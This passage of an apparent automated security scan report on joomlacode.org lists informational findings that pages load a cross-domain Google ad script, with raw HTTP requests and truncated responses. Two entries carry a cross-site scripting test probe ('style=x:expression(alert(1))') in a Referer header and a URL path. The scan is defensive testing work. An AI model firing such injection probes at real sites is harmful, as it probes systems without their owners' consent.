Content-Type: text/html; charset=UTF-8
Content-Length: 18427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.263. http://joomlacode.org/gf/project/joomla/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/news/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:23:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.264. http://joomlacode.org/gf/project/joomla/reporting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/reporting/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/reporting/ HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.1.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.265. http://joomlacode.org/gf/project/joomla/scmsvn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/scmsvn/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/scmsvn/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.266. http://joomlacode.org/gf/project/joomla/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/search/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/search/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:22:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.267. http://joomlacode.org/gf/project/joomla/tracker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/tracker/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/tracker/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.268. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:15:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.269. http://joomlacode.org/gf/project/joomlaxplorer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomlaxplorer/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomlaxplorer/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:56:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.270. http://joomlacode.org/gf/project/jpack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/jpack/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jpack/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:53:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.271. http://joomlacode.org/gf/project/jpub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/jpub/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jpub/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:47:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.272. http://joomlacode.org/gf/project/jtranslation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/jtranslation/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jtranslation/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.273. http://joomlacode.org/gf/project/kunena/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/kunena/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/kunena/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:55:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.274. http://joomlacode.org/gf/project/mambot_google1/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/mambot_google1/news/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/mambot_google1/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:42:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.275. http://joomlacode.org/gf/project/opengallery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/opengallery/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/opengallery/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:40:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.276. http://joomlacode.org/gf/project/opengallery/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/opengallery/news/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/opengallery/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:37:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.277. http://joomlacode.org/gf/project/showplus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/showplus/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/showplus/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:50:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.278. http://joomlacode.org/gf/project/spanish/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/spanish/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/spanish/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:51:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.279. http://joomlacode.org/gf/project/sportpool/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/sportpool/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/sportpool/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:44:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.280. http://joomlacode.org/gf/project/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/support/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/support/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:56:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.281. http://joomlacode.org/gf/project/virtuemart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/virtuemart/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/virtuemart/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:54:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.282. http://joomlacode.org/gf/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/search/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/search/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:12:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.283. http://joomlacode.org/gf/snippet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/snippet/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/snippet/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:15:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

